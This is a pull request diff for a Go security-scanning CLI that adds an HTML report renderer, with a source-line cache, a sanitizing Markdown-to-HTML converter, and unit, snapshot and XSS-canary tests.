### PR TITLE
chore: ufm html renderer

### DIFF
--- a/internal/presenters/components.go
+++ b/internal/presenters/components.go
@@ -286,16 +286,16 @@ func RenderTip(str string) string {
 
 func FilterSeverityASC(original []string, severityMinLevel string) []string {
 	if severityMinLevel == "" {
-		return original
+		return slices.Clone(original)
 	}
 
 	minLevelPointer := slices.Index(original, severityMinLevel)
 
 	if minLevelPointer >= 0 {
-		return original[minLevelPointer:]
+		return slices.Clone(original[minLevelPointer:])
 	}
 
-	return original
+	return slices.Clone(original)
 }
 
 type SummaryData struct {

--- a/internal/presenters/funcs.go
+++ b/internal/presenters/funcs.go
@@ -1,6 +1,7 @@
 package presenters
 
 import (
+	"bufio"
 	"bytes"
 	"context"
 	"encoding/json"
@@ -8,7 +9,9 @@ import (
 	htmlTemplate "html/template"
 	"maps"
 	"os"
+	"path/filepath"
 	"reflect"
+	"regexp"
 	"slices"
 	"strconv"
 	"strings"
@@ -589,13 +592,410 @@ func getUnionValue(input interface{}) interface{} {
 	return result
 }
 
-func getHTMLTemplateFuncMap() htmlTemplate.FuncMap {
+type sourceLineCache struct {
+	lines    map[string][]string
+	baseDirs []string
+}
+
+const maxSourceFileSize = 10 * 1024 * 1024 // 10 MB
+
+func newSourceLineCache(baseDirs []string) *sourceLineCache {
+	return &sourceLineCache{
+		lines:    make(map[string][]string),
+		baseDirs: baseDirs,
+	}
+}
+
+func (c *sourceLineCache) resolveFile(filePath string) string {
+	if filepath.IsAbs(filePath) {
+		if _, err := os.Stat(filePath); err == nil {
+			return filePath
+		}
+		return ""
+	}
+	for _, base := range c.baseDirs {
+		resolved := filepath.Join(base, filePath)
+		if _, err := os.Stat(resolved); err == nil {
+			return resolved
+		}
+	}
+	return ""
+}
+
+func (c *sourceLineCache) loadFile(filePath string) []string {
+	if cached, ok := c.lines[filePath]; ok {
+		return cached
+	}
+
+	resolved := c.resolveFile(filePath)
+	if resolved == "" {
+		c.lines[filePath] = nil
+		return nil
+	}
+
+	info, err := os.Stat(resolved)
+	if err != nil || info.Size() > maxSourceFileSize {
+		c.lines[filePath] = nil
+		return nil
+	}
+
+	f, err := os.Open(resolved)
+	if err != nil {
+		c.lines[filePath] = nil
+		return nil
+	}
+	defer f.Close()
+
+	var fileLines []string
+	scanner := bufio.NewScanner(f)
+	for scanner.Scan() {
+		fileLines = append(fileLines, scanner.Text())
+	}
+
+	c.lines[filePath] = fileLines
+	return fileLines
+}
+
+func (c *sourceLineCache) ReadLine(filePath string, line int) string {
+	fileLines := c.loadFile(filePath)
+	if line < 1 || line > len(fileLines) {
+		return ""
+	}
+	return strings.TrimRight(fileLines[line-1], " \t")
+}
+
+func (c *sourceLineCache) ReadLineMarked(filePath string, line int, fromCol, toCol *int) [3]string {
+	fullLine := c.ReadLine(filePath, line)
+	if fullLine == "" || fromCol == nil {
+		return [3]string{fullLine, "", ""}
+	}
+	fc := *fromCol - 1 // convert to 0-based
+	if fc < 0 {
+		fc = 0
+	}
+	if fc > len(fullLine) {
+		fc = len(fullLine)
+	}
+
+	tc := len(fullLine)
+	if toCol != nil {
+		tc = *toCol // toCol is exclusive end
+		if tc > len(fullLine) {
+			tc = len(fullLine)
+		}
+	}
+	if tc <= fc {
+		tc = fc
+	}
+
+	return [3]string{fullLine[:fc], fullLine[fc:tc], fullLine[tc:]}
+}
+
+func resolveMessageArgs(text string, args []string) string {
+	for i, arg := range args {
+		text = strings.ReplaceAll(text, fmt.Sprintf("{%d}", i), arg)
+	}
+	return text
+}
+
+func getHTMLTemplateFuncMap(config configuration.Configuration) htmlTemplate.FuncMap {
+	baseDirs := config.GetStringSlice(configuration.INPUT_DIRECTORY)
+	cache := newSourceLineCache(baseDirs)
+
 	fnMap := htmlTemplate.FuncMap{}
-	// render simple HTML hello world in red
-	fnMap["helloworld"] = func() htmlTemplate.HTML {
-		return htmlTemplate.HTML("<h1 style='color: red;'>Hello World</h1>")
+	fnMap["severityColor"] = SeverityColor
+	fnMap["severityLetter"] = SeverityLetter
+	fnMap["toUpperCase"] = strings.ToUpper
+	fnMap["toLowerCase"] = strings.ToLower
+	fnMap["truncateText"] = TruncateText
+	fnMap["markdownToHTML"] = MarkdownToHTML
+	fnMap["sub"] = sub
+	fnMap["list"] = func(args ...testapi.FindingType) []testapi.FindingType { return args }
+	fnMap["getExecutionFlowsFromIssue"] = getExecutionFlowsFromIssue
+	fnMap["getSnykCodeRuleFromIssue"] = getSnykCodeRuleFromIssue
+	fnMap["getCoverageFromTestResult"] = getCoverageFromTestResult
+	fnMap["getFindingExtraFromIssue"] = getFindingExtraFromIssue
+	fnMap["readSourceLine"] = cache.ReadLine
+	fnMap["readSourceLineMarked"] = cache.ReadLineMarked
+	fnMap["resolveMessageArgs"] = resolveMessageArgs
+	fnMap["dict"] = func(pairs ...interface{}) map[string]interface{} {
+		m := make(map[string]interface{}, len(pairs)/2)
+		for i := 0; i+1 < len(pairs); i += 2 {
+			key, ok := pairs[i].(string)
+			if ok {
+				m[key] = pairs[i+1]
+			}
+		}
+		return m
+	}
+	fnMap["index3"] = func(arr [3]string, i int) string { return arr[i] }
+	fnMap["int"] = func(v interface{}) int {
+		if p, ok := v.(*int); ok && p != nil {
+			return *p
+		}
+		return toInt(v)
+	}
+	fnMap["reportTimestamp"] = func(testResults []testapi.TestResult) string {
+		for _, tr := range testResults {
+			if t := tr.GetCreatedAt(); t != nil {
+				return t.Format("January 02, 2006 15:04 UTC")
+			}
+		}
+		return time.Now().UTC().Format("January 02, 2006 15:04 UTC")
+	}
+	fnMap["getSortedIssuesDesc"] = func(summary *testapi.IssueSummary) []testapi.Issue {
+		if summary == nil {
+			return []testapi.Issue{}
+		}
+		sorting := FilterSeverityASC(json_schemas.DEFAULT_SEVERITIES, config.GetString(configuration.FLAG_SEVERITY_THRESHOLD))
+		slices.Reverse(sorting)
+		return summary.GetSortedIssues(sorting)
 	}
 	return fnMap
+}
+
+func SeverityColor(severity string) string {
+	switch strings.ToLower(severity) {
+	case "critical":
+		return "#AB1A1A"
+	case "high":
+		return "#CE5019"
+	case "medium":
+		return "#D68000"
+	case "low":
+		return "#88879E"
+	default:
+		return "#88879E"
+	}
+}
+
+func SeverityLetter(severity string) string {
+	s := strings.ToUpper(strings.TrimSpace(severity))
+	if len(s) == 0 {
+		return "?"
+	}
+	return s[:1]
+}
+
+func TruncateText(s string, maxLen int) string {
+	runes := []rune(s)
+	if len(runes) <= maxLen {
+		return s
+	}
+	return string(runes[:maxLen]) + "..."
+}
+
+var (
+	mdLinkRegexp          = regexp.MustCompile(`\[([^\]]+)\]\(((?:[^()\s]|\([^()]*\))*)\)`)
+	mdBoldRegexp          = regexp.MustCompile(`\*\*([^*]+)\*\*`)
+	mdInlineCodeRegexp    = regexp.MustCompile("`([^`]+)`")
+	mdOrderedListRegexp   = regexp.MustCompile(`^\d+\.\s+(.*)`)
+	mdTableSeparatorRegex = regexp.MustCompile(`^\|[\s:]*-+[\s:]*(\|[\s:]*-+[\s:]*)*\|?$`)
+)
+
+func MarkdownToHTML(input string) htmlTemplate.HTML {
+	escaped := htmlTemplate.HTMLEscapeString(input)
+	lines := strings.Split(escaped, "\n")
+
+	var result strings.Builder
+	inCodeBlock := false
+	listTag := ""
+	closeList := func() {
+		if listTag != "" {
+			result.WriteString("</" + listTag + ">")
+			listTag = ""
+		}
+	}
+	openList := func(tag string) {
+		if listTag != tag {
+			closeList()
+			result.WriteString("<" + tag + ">")
+			listTag = tag
+		}
+	}
+
+	for i := 0; i < len(lines); i++ {
+		line := lines[i]
+		trimmed := strings.TrimSpace(line)
+
+		if strings.HasPrefix(trimmed, "```") {
+			closeList()
+			if inCodeBlock {
+				result.WriteString("</code></pre>")
+			} else {
+				result.WriteString("<pre><code>")
+			}
+			inCodeBlock = !inCodeBlock
+			continue
+		}
+
+		if inCodeBlock {
+			result.WriteString(line)
+			result.WriteString("\n")
+			continue
+		}
+
+		if trimmed == "" {
+			closeList()
+			continue
+		}
+
+		if isHorizontalRule(trimmed) {
+			closeList()
+			result.WriteString("<hr>")
+			continue
+		}
+
+		if strings.HasPrefix(trimmed, "- ") || strings.HasPrefix(trimmed, "* ") {
+			openList("ul")
+			result.WriteString("<li>")
+			result.WriteString(applyInlineMarkdown(trimmed[2:]))
+			result.WriteString("</li>")
+			continue
+		}
+
+		if m := mdOrderedListRegexp.FindStringSubmatch(trimmed); m != nil {
+			openList("ol")
+			result.WriteString("<li>")
+			result.WriteString(applyInlineMarkdown(m[1]))
+			result.WriteString("</li>")
+			continue
+		}
+
+		if isTableRow(trimmed) {
+			closeList()
+			i = renderTable(&result, lines, i)
+			continue
+		}
+
+		closeList()
+		renderBlockLine(&result, trimmed)
+	}
+
+	closeList()
+	if inCodeBlock {
+		result.WriteString("</code></pre>")
+	}
+
+	return htmlTemplate.HTML(result.String()) //nolint:gosec // input is HTML-escaped above before markdown conversion
+}
+
+func isHorizontalRule(s string) bool {
+	return s == "---" || s == "***" || s == "___"
+}
+
+func isTableRow(s string) bool {
+	return strings.HasPrefix(s, "|")
+}
+
+func parseTableCells(row string) []string {
+	row = strings.TrimSpace(row)
+	row = strings.TrimPrefix(row, "|")
+	row = strings.TrimSuffix(row, "|")
+	parts := strings.Split(row, "|")
+	cells := make([]string, 0, len(parts))
+	for _, p := range parts {
+		cells = append(cells, strings.TrimSpace(p))
+	}
+	return cells
+}
+
+func renderTable(result *strings.Builder, lines []string, startIndex int) int {
+	i := startIndex
+	headerCells := parseTableCells(lines[i])
+	i++
+
+	hasSeparator := i < len(lines) && mdTableSeparatorRegex.MatchString(strings.TrimSpace(lines[i]))
+	if hasSeparator {
+		i++
+	}
+
+	result.WriteString("<table><thead><tr>")
+	for _, cell := range headerCells {
+		result.WriteString("<th>")
+		result.WriteString(applyInlineMarkdown(cell))
+		result.WriteString("</th>")
+	}
+	result.WriteString("</tr></thead><tbody>")
+
+	for i < len(lines) && isTableRow(strings.TrimSpace(lines[i])) {
+		trimmed := strings.TrimSpace(lines[i])
+		if mdTableSeparatorRegex.MatchString(trimmed) {
+			i++
+			continue
+		}
+		cells := parseTableCells(trimmed)
+		result.WriteString("<tr>")
+		for _, cell := range cells {
+			result.WriteString("<td>")
+			result.WriteString(applyInlineMarkdown(cell))
+			result.WriteString("</td>")
+		}
+		result.WriteString("</tr>")
+		i++
+	}
+
+	result.WriteString("</tbody></table>")
+	return i - 1
+}
+
+func renderBlockLine(result *strings.Builder, trimmed string) {
+	if heading, level := parseHeading(trimmed); heading != "" {
+		tag := fmt.Sprintf("h%d", level)
+		result.WriteString("<" + tag + ">")
+		result.WriteString(applyInlineMarkdown(heading))
+		result.WriteString("</" + tag + ">")
+		return
+	}
+	result.WriteString("<p>")
+	result.WriteString(applyInlineMarkdown(trimmed))
+	result.WriteString("</p>")
+}
+
+func parseHeading(line string) (string, int) {
+	level := 0
+	for _, c := range line {
+		if c == '#' {
+			level++
+		} else {
+			break
+		}
+	}
+	if level > 0 && level <= 6 && len(line) > level && line[level] == ' ' {
+		return strings.TrimSpace(line[level+1:]), level
+	}
+	return "", 0
+}
+
+func isAllowedHref(href string) bool {
+	normalized := strings.ToLower(strings.TrimSpace(href))
+	if strings.HasPrefix(normalized, "javascript:") || strings.HasPrefix(normalized, "data:") || strings.HasPrefix(normalized, "vbscript:") {
+		return false
+	}
+	if strings.HasPrefix(normalized, "//") {
+		return false
+	}
+	return true
+}
+
+func applyInlineMarkdown(s string) string {
+	s = mdLinkRegexp.ReplaceAllStringFunc(s, func(match string) string {
+		parts := mdLinkRegexp.FindStringSubmatch(match)
+		if len(parts) != 3 {
+			return match
+		}
+		text, href := parts[1], parts[2]
+		if !isAllowedHref(href) {
+			return text + " (" + href + ")"
+		}
+		return "\x00LINK_START\x00" + href + "\x00LINK_MID\x00" + text + "\x00LINK_END\x00"
+	})
+	s = mdBoldRegexp.ReplaceAllString(s, `<strong>$1</strong>`)
+	s = mdInlineCodeRegexp.ReplaceAllString(s, `<code>$1</code>`)
+	s = strings.ReplaceAll(s, "\x00LINK_START\x00", `<a href="`)
+	s = strings.ReplaceAll(s, "\x00LINK_MID\x00", `" target="_blank" rel="noopener noreferrer">`)
+	s = strings.ReplaceAll(s, "\x00LINK_END\x00", `</a>`)
+	return s
 }
 
 func getDefaultTemplateFuncMap(config configuration.Configuration, ri runtimeinfo.RuntimeInfo) template.FuncMap {

--- a/internal/presenters/funcs_test.go
+++ b/internal/presenters/funcs_test.go
@@ -1,0 +1,219 @@
+package presenters
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func intPtr(v int) *int {
+	return &v
+}
+
+func TestResolveMessageArgs(t *testing.T) {
+	testCases := []struct {
+		desc string
+		text string
+		args []string
+		want string
+	}{
+		{
+			desc: "normal replacement of two placeholders",
+			text: "input from {0} flows into {1}",
+			args: []string{"a file", "readFile"},
+			want: "input from a file flows into readFile",
+		},
+		{
+			desc: "no placeholders in text",
+			text: "no placeholders here",
+			args: []string{"arg0"},
+			want: "no placeholders here",
+		},
+		{
+			desc: "empty args leaves placeholders intact",
+			text: "{0} is {1}",
+			args: []string{},
+			want: "{0} is {1}",
+		},
+		{
+			desc: "more placeholders than args leaves extras intact",
+			text: "{0} and {1} and {2}",
+			args: []string{"only", "two"},
+			want: "only and two and {2}",
+		},
+		{
+			desc: "empty text returns empty string",
+			text: "",
+			args: []string{"arg0"},
+			want: "",
+		},
+		{
+			desc: "nil args leaves placeholders intact",
+			text: "text {0}",
+			args: nil,
+			want: "text {0}",
+		},
+		{
+			desc: "single placeholder single arg",
+			text: "hello {0}!",
+			args: []string{"world"},
+			want: "hello world!",
+		},
+		{
+			desc: "repeated placeholder is replaced in all occurrences",
+			text: "{0} and {0} again",
+			args: []string{"val"},
+			want: "val and val again",
+		},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.desc, func(t *testing.T) {
+			got := resolveMessageArgs(tc.text, tc.args)
+			assert.Equal(t, tc.want, got)
+		})
+	}
+}
+
+func TestReadLineMarked(t *testing.T) {
+	// Create a temp file with known content for testing.
+	tmpDir := t.TempDir()
+	testFileName := "test_source.go"
+	testFilePath := filepath.Join(tmpDir, testFileName)
+	content := "hello world\n\tfmt.Println(x)\nabcdefghij\n"
+	err := os.WriteFile(testFilePath, []byte(content), 0644)
+	assert.NoError(t, err)
+
+	cache := newSourceLineCache([]string{tmpDir})
+
+	testCases := []struct {
+		desc    string
+		file    string
+		line    int
+		fromCol *int
+		toCol   *int
+		want    [3]string
+	}{
+		{
+			desc:    "normal case - mark middle of line",
+			file:    testFileName,
+			line:    1,
+			fromCol: intPtr(7),
+			toCol:   intPtr(12),
+			want:    [3]string{"hello ", "world", ""},
+		},
+		{
+			desc:    "nil fromCol returns full line as prefix",
+			file:    testFileName,
+			line:    1,
+			fromCol: nil,
+			toCol:   intPtr(5),
+			want:    [3]string{"hello world", "", ""},
+		},
+		{
+			desc:    "nil toCol marks to end of line",
+			file:    testFileName,
+			line:    1,
+			fromCol: intPtr(7),
+			toCol:   nil,
+			want:    [3]string{"hello ", "world", ""},
+		},
+		{
+			desc:    "fromCol beyond line length returns full line as prefix with empty marker",
+			file:    testFileName,
+			line:    1,
+			fromCol: intPtr(100),
+			toCol:   intPtr(105),
+			want:    [3]string{"hello world", "", ""},
+		},
+		{
+			desc:    "toCol before fromCol results in empty marker",
+			file:    testFileName,
+			line:    1,
+			fromCol: intPtr(7),
+			toCol:   intPtr(3),
+			want:    [3]string{"hello ", "", "world"},
+		},
+		{
+			desc:    "fromCol at 1 marks from beginning",
+			file:    testFileName,
+			line:    1,
+			fromCol: intPtr(1),
+			toCol:   intPtr(6),
+			want:    [3]string{"", "hello ", "world"},
+		},
+		{
+			desc:    "missing file returns all empty strings",
+			file:    "nonexistent.go",
+			line:    1,
+			fromCol: intPtr(1),
+			toCol:   intPtr(5),
+			want:    [3]string{"", "", ""},
+		},
+		{
+			desc:    "line out of range returns all empty strings",
+			file:    testFileName,
+			line:    999,
+			fromCol: intPtr(1),
+			toCol:   intPtr(5),
+			want:    [3]string{"", "", ""},
+		},
+		{
+			desc:    "line 0 returns all empty strings",
+			file:    testFileName,
+			line:    0,
+			fromCol: intPtr(1),
+			toCol:   intPtr(5),
+			want:    [3]string{"", "", ""},
+		},
+		{
+			desc:    "second line with tab",
+			file:    testFileName,
+			line:    2,
+			fromCol: intPtr(2),
+			toCol:   intPtr(14),
+			want:    [3]string{"\t", "fmt.Println(x", ")"},
+		},
+		{
+			desc:    "mark entire line",
+			file:    testFileName,
+			line:    3,
+			fromCol: intPtr(1),
+			toCol:   nil,
+			want:    [3]string{"", "abcdefghij", ""},
+		},
+		{
+			desc:    "both fromCol and toCol nil returns full line as prefix",
+			file:    testFileName,
+			line:    1,
+			fromCol: nil,
+			toCol:   nil,
+			want:    [3]string{"hello world", "", ""},
+		},
+		{
+			desc:    "fromCol equals toCol gives single char marker due to 1-based fromCol",
+			file:    testFileName,
+			line:    1,
+			fromCol: intPtr(3),
+			toCol:   intPtr(3),
+			want:    [3]string{"he", "l", "lo world"},
+		},
+		{
+			desc:    "toCol beyond line length is clamped",
+			file:    testFileName,
+			line:    1,
+			fromCol: intPtr(7),
+			toCol:   intPtr(100),
+			want:    [3]string{"hello ", "world", ""},
+		},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.desc, func(t *testing.T) {
+			got := cache.ReadLineMarked(tc.file, tc.line, tc.fromCol, tc.toCol)
+			assert.Equal(t, tc.want, got)
+		})
+	}
+}

--- a/internal/presenters/presenter_ufm.go
+++ b/internal/presenters/presenter_ufm.go
@@ -86,7 +86,7 @@ func NewUfmRenderer(results []testapi.TestResult, config configuration.Configura
 					return nil, nil, err
 				}
 
-				functionMapMimeType := getHTMLTemplateFuncMap()
+				functionMapMimeType := getHTMLTemplateFuncMap(config)
 				return ufmTemplate, functionMapMimeType, nil
 			},
 		},

--- a/internal/presenters/presenter_ufm_test.go
+++ b/internal/presenters/presenter_ufm_test.go
@@ -31,6 +31,7 @@ import (
 	"github.com/snyk/go-application-framework/pkg/apiclients/testapi"
 	"github.com/snyk/go-application-framework/pkg/configuration"
 	localworkflows "github.com/snyk/go-application-framework/pkg/local_workflows"
+
 	"github.com/snyk/go-application-framework/pkg/local_workflows/local_models"
 	"github.com/snyk/go-application-framework/pkg/runtimeinfo"
 	sarif_utils "github.com/snyk/go-application-framework/pkg/utils/sarif"
@@ -75,7 +76,7 @@ func validateHTMLOutput(t *testing.T, data []byte) {
 	doc, err := html.Parse(bytes.NewReader(data))
 	require.NoError(t, err, "rendered output must parse as HTML")
 
-	var doctypeCount, htmlCount, headCount, bodyCount int
+	var doctypeCount, htmlCount, headCount, bodyCount, mainCount int
 	var walk func(n *html.Node)
 	walk = func(n *html.Node) {
 		switch n.Type {
@@ -91,6 +92,8 @@ func validateHTMLOutput(t *testing.T, data []byte) {
 				headCount++
 			case "body":
 				bodyCount++
+			case "main":
+				mainCount++
 			}
 		default:
 			// other node types (text, comments, etc.) are irrelevant to the structural checks
@@ -101,15 +104,36 @@ func validateHTMLOutput(t *testing.T, data []byte) {
 	}
 	walk(doc)
 
-	// Note html.Parse is a WHATWG error-correcting parser that rarely
-	// errors and synthesizes missing html/head/body elements, so the meaningful
-	// assertions are the doctype and element-uniqueness counts. Extend with XSS
-	// canaries (javascript: hrefs, on* attributes) once the template renders
-	// finding content.
 	assert.Equal(t, 1, doctypeCount, "expected exactly one <!doctype html>")
 	assert.Equal(t, 1, htmlCount, "expected exactly one <html> element")
 	assert.Equal(t, 1, headCount, "expected exactly one <head> element")
 	assert.Equal(t, 1, bodyCount, "expected exactly one <body> element")
+	assert.Equal(t, 1, mainCount, "expected exactly one <main> element")
+
+	// XSS canaries: verify html/template auto-escaping prevents script injection
+	assertNoXSSPatterns(t, doc)
+}
+
+func assertNoXSSPatterns(t *testing.T, doc *html.Node) {
+	t.Helper()
+
+	var walkXSS func(n *html.Node)
+	walkXSS = func(n *html.Node) {
+		if n.Type == html.ElementNode {
+			for _, attr := range n.Attr {
+				if strings.HasPrefix(attr.Key, "on") {
+					t.Errorf("XSS canary: found on* attribute %q on <%s>", attr.Key, n.Data)
+				}
+				if attr.Key == "href" && strings.HasPrefix(strings.TrimSpace(strings.ToLower(attr.Val)), "javascript:") {
+					t.Errorf("XSS canary: found javascript: href on <%s>", n.Data)
+				}
+			}
+		}
+		for c := n.FirstChild; c != nil; c = c.NextSibling {
+			walkXSS(c)
+		}
+	}
+	walkXSS(doc)
 }
 
 // normalizeAutomationID removes project name and timestamp from automation ID
@@ -1387,12 +1411,46 @@ func Test_UfmPresenter_HTML(t *testing.T) {
 	ri := runtimeinfo.New(runtimeinfo.WithName("snyk-cli"), runtimeinfo.WithVersion("1.1301.0"))
 
 	testCases := []struct {
-		name           string
-		testResultPath string
+		name              string
+		testResultPath    string
+		includeIgnores    bool
+		severityThreshold string
+		assertions        func(t *testing.T, output string)
 	}{
 		{
-			name:           "cli",
+			name:           "cli_sca",
 			testResultPath: "testdata/ufm/testresult_cli.json",
+			assertions:     assertCLISCAHTMLContent,
+		},
+		{
+			name:           "secrets",
+			testResultPath: "testdata/ufm/secrets.testresult.json",
+			assertions:     assertSecretsHTMLContent,
+		},
+		{
+			name:           "multi_project",
+			testResultPath: "testdata/ufm/multi_project.testresult.json",
+			assertions:     assertMultiProjectHTMLContent,
+		},
+		{
+			name:           "secrets_0findings",
+			testResultPath: "testdata/ufm/secrets.0findings.testresult.json",
+			assertions: func(t *testing.T, output string) {
+				t.Helper()
+				assert.Contains(t, output, "Snyk Test Report")
+			},
+		},
+		{
+			name:              "webgoat_with_ignores",
+			testResultPath:    "testdata/ufm/webgoat.ignore.testresult.json",
+			includeIgnores:    true,
+			severityThreshold: "medium",
+			assertions:        assertWebgoatIgnoredHTMLContent,
+		},
+		{
+			name:           "webgoat_without_ignores",
+			testResultPath: "testdata/ufm/webgoat.ignore.testresult.json",
+			assertions:     assertWebgoatNoIgnoresHTMLContent,
 		},
 	}
 
@@ -1407,12 +1465,124 @@ func Test_UfmPresenter_HTML(t *testing.T) {
 			assert.NoError(t, err)
 
 			config := configuration.NewWithOpts()
+			if tc.severityThreshold != "" {
+				config.Set(configuration.FLAG_SEVERITY_THRESHOLD, tc.severityThreshold)
+			}
+			config.Set(configuration.FLAG_INCLUDE_IGNORES, tc.includeIgnores)
 			writer := &bytes.Buffer{}
 
 			presenter := presenters.NewUfmRenderer(testResult, config, writer, presenters.UfmWithRuntimeInfo(ri))
 			err = presenter.RenderTemplate(presenters.ApplicationHTMLTemplatesUfm, presenters.ApplicationHTMLMimeType)
 			assert.NoError(t, err)
+
 			validateHTMLOutput(t, writer.Bytes())
+
+			if tc.assertions != nil {
+				tc.assertions(t, writer.String())
+			}
+		})
+	}
+}
+
+func Test_UfmPresenter_HTMLSnapshot(t *testing.T) {
+	ri := runtimeinfo.New(runtimeinfo.WithName("snyk-cli"), runtimeinfo.WithVersion("1.1301.0"))
+
+	testCases := []struct {
+		name              string
+		expectedPath      string
+		testResultPath    string
+		includeIgnores    bool
+		severityThreshold string
+	}{
+		{
+			name:              "cli",
+			expectedPath:      "testdata/ufm/cli.html",
+			testResultPath:    "testdata/ufm/testresult_cli.json",
+			includeIgnores:    false,
+			severityThreshold: "",
+		},
+		{
+			name:              "webgoat",
+			expectedPath:      "testdata/ufm/webgoat.ignore.html",
+			testResultPath:    "testdata/ufm/webgoat.ignore.testresult.json",
+			includeIgnores:    true,
+			severityThreshold: "medium",
+		},
+		{
+			name:              "secrets",
+			expectedPath:      "testdata/ufm/secrets.html",
+			testResultPath:    "testdata/ufm/secrets.testresult.json",
+			includeIgnores:    true,
+			severityThreshold: "",
+		},
+		{
+			name:              "multi_project",
+			expectedPath:      "testdata/ufm/multi_project.html",
+			testResultPath:    "testdata/ufm/multi_project.testresult.json",
+			includeIgnores:    false,
+			severityThreshold: "",
+		},
+		{
+			name:              "secrets_duplicated_rules",
+			expectedPath:      "testdata/ufm/secrets.duplicated-sarif-rules.html",
+			testResultPath:    "testdata/ufm/secrets.duplicated-sarif-rules.testresult.json",
+			includeIgnores:    true,
+			severityThreshold: "",
+		},
+		{
+			name:              "secrets_with_report",
+			expectedPath:      "testdata/ufm/secrets.with-report.html",
+			testResultPath:    "testdata/ufm/secrets.with-report.testresult.json",
+			includeIgnores:    true,
+			severityThreshold: "",
+		},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			require.FileExists(t, tc.testResultPath, "fixture missing — regenerate via `make generate-fixture` (see CONTRIBUTING.md)")
+
+			expectedBytes, err := os.ReadFile(tc.expectedPath)
+			if os.IsNotExist(err) && regenerateExpectedFiles {
+				expectedBytes = nil
+			} else {
+				assert.NoError(t, err)
+			}
+
+			testResultBytes, err := os.ReadFile(tc.testResultPath)
+			assert.NoError(t, err)
+
+			testResult, err := ufm.NewSerializableTestResultFromBytes(testResultBytes)
+			assert.NoError(t, err)
+
+			config := configuration.NewWithOpts()
+			config.Set(configuration.ORGANIZATION_SLUG, "My Org")
+			if tc.severityThreshold != "" {
+				config.Set(configuration.FLAG_SEVERITY_THRESHOLD, tc.severityThreshold)
+			}
+			config.Set(configuration.FLAG_INCLUDE_IGNORES, tc.includeIgnores)
+
+			writer := &bytes.Buffer{}
+
+			presenter := presenters.NewUfmRenderer(testResult, config, writer, presenters.UfmWithRuntimeInfo(ri))
+			err = presenter.RenderTemplate(presenters.ApplicationHTMLTemplatesUfm, presenters.ApplicationHTMLMimeType)
+			assert.NoError(t, err)
+
+			actualBytes := writer.Bytes()
+
+			validateHTMLOutput(t, actualBytes)
+
+			if regenerateExpectedFiles {
+				if writeErr := os.WriteFile(tc.expectedPath, actualBytes, 0o644); writeErr != nil {
+					t.Fatalf("failed to regenerate %s: %v", tc.expectedPath, writeErr)
+				}
+				t.Skipf("regenerated %s", tc.expectedPath)
+			}
+
+			assert.NotEmpty(t, actualBytes)
+
+			assert.NotEmpty(t, expectedBytes)
+			assert.Equal(t, string(expectedBytes), string(actualBytes))
 		})
 	}
 }
@@ -1695,6 +1865,384 @@ func Test_UfmPresenter_HTMLFromSarifInput(t *testing.T) {
 	err := presenter.RenderTemplate(presenters.ApplicationHTMLTemplatesUfm, presenters.ApplicationHTMLMimeType)
 	require.NoError(t, err)
 	validateHTMLOutput(t, writer.Bytes())
+}
+
+func Test_UfmPresenter_HTMLDataFlow(t *testing.T) {
+	ri := runtimeinfo.New(runtimeinfo.WithName("snyk-cli"), runtimeinfo.WithVersion("1.1301.0"))
+
+	result := sarifToUFM(t, "testdata/3-low-issues.json", nil)
+
+	// Set INPUT_DIRECTORY to the repo root so source lines resolve
+	repoRoot := filepath.Join("..", "..")
+	absRoot, err := filepath.Abs(repoRoot)
+	require.NoError(t, err)
+
+	config := configuration.NewWithOpts()
+	config.Set(configuration.INPUT_DIRECTORY, absRoot)
+	writer := &bytes.Buffer{}
+
+	presenter := presenters.NewUfmRenderer(
+		[]testapi.TestResult{result},
+		config,
+		writer,
+		presenters.UfmWithRuntimeInfo(ri),
+	)
+	err = presenter.RenderTemplate(presenters.ApplicationHTMLTemplatesUfm, presenters.ApplicationHTMLMimeType)
+	require.NoError(t, err)
+	validateHTMLOutput(t, writer.Bytes())
+
+	output := writer.String()
+
+	assert.Contains(t, output, `class="dataflow"`, "expected data flow section")
+	assert.Contains(t, output, `class="dataflow__filename"`, "expected filename block")
+	assert.Contains(t, output, `class="dataflow__item"`, "expected data flow step items")
+	assert.Contains(t, output, `class="dataflow__step"`, "expected step numbers")
+	assert.Contains(t, output, `class="dataflow__lineno"`, "expected line numbers")
+	assert.Contains(t, output, ">Source</span>", "expected Source badge on first step")
+	assert.Contains(t, output, ">Sink</span>", "expected Sink badge on last step")
+
+	// Verify source code lines are read from disk (text may be split across marker spans)
+	assert.Contains(t, output, "return &amp;use", "expected source code line prefix from pkg/analytics/analytics_test.go:248")
+	assert.Contains(t, output, `class="marker"`, "expected marker highlighting in data flow")
+
+	// Verify scan coverage is rendered
+	assert.Contains(t, output, "Scan coverage", "expected scan coverage label")
+	assert.Contains(t, output, "Go:", "expected Go language in coverage")
+
+	// Verify fix analysis is rendered from help markdown
+	assert.Contains(t, output, `class="fix-analysis"`, "expected fix analysis section")
+	assert.Contains(t, output, "hardcoded credentials", "expected fix analysis content from help markdown")
+
+	// Verify tab toggle is rendered when both data flow and fix analysis exist
+	assert.Contains(t, output, `class="card-tab-radio"`, "expected tab radio inputs")
+	assert.Contains(t, output, `class="card-tab-bar"`, "expected tab bar")
+	assert.Contains(t, output, `>Data Flow</label>`, "expected Data Flow tab label")
+	assert.Contains(t, output, `>Fix Analysis</label>`, "expected Fix Analysis tab label")
+}
+
+func assertCLISCAHTMLContent(t *testing.T, output string) {
+	t.Helper()
+
+	// Page structure
+	assert.Contains(t, output, "Snyk Test Report")
+	assert.Contains(t, output, "<!doctype html>")
+	assert.Contains(t, output, `<svg width="68" height="35"`, "Snyk logo SVG should be present")
+	assert.Contains(t, output, `href="https://snyk.io"`, "Snyk logo should link to snyk.io")
+	assert.Contains(t, output, `<meta name="description" content="9 open issues.">`, "expected meta description with issue count")
+
+	// Metadata from fixture
+	assert.Contains(t, output, "package.json")
+	assert.Contains(t, output, "552")
+
+	// Known vulnerability IDs must appear
+	expectedIDs := []string{
+		"SNYK-JS-BRACEEXPANSION-9789073",
+		"SNYK-JS-COOKIE-13271683",
+		"SNYK-JS-DEBUG-14214893",
+		"SNYK-JS-GOT-2932019",
+		"SNYK-JS-MARKED-2342082",
+		"SNYK-JS-ASYNC-12239908",
+		"SNYK-JS-LODASH-12239302",
+	}
+	for _, id := range expectedIDs {
+		assert.Contains(t, output, id, "expected vulnerability ID %s in HTML output", id)
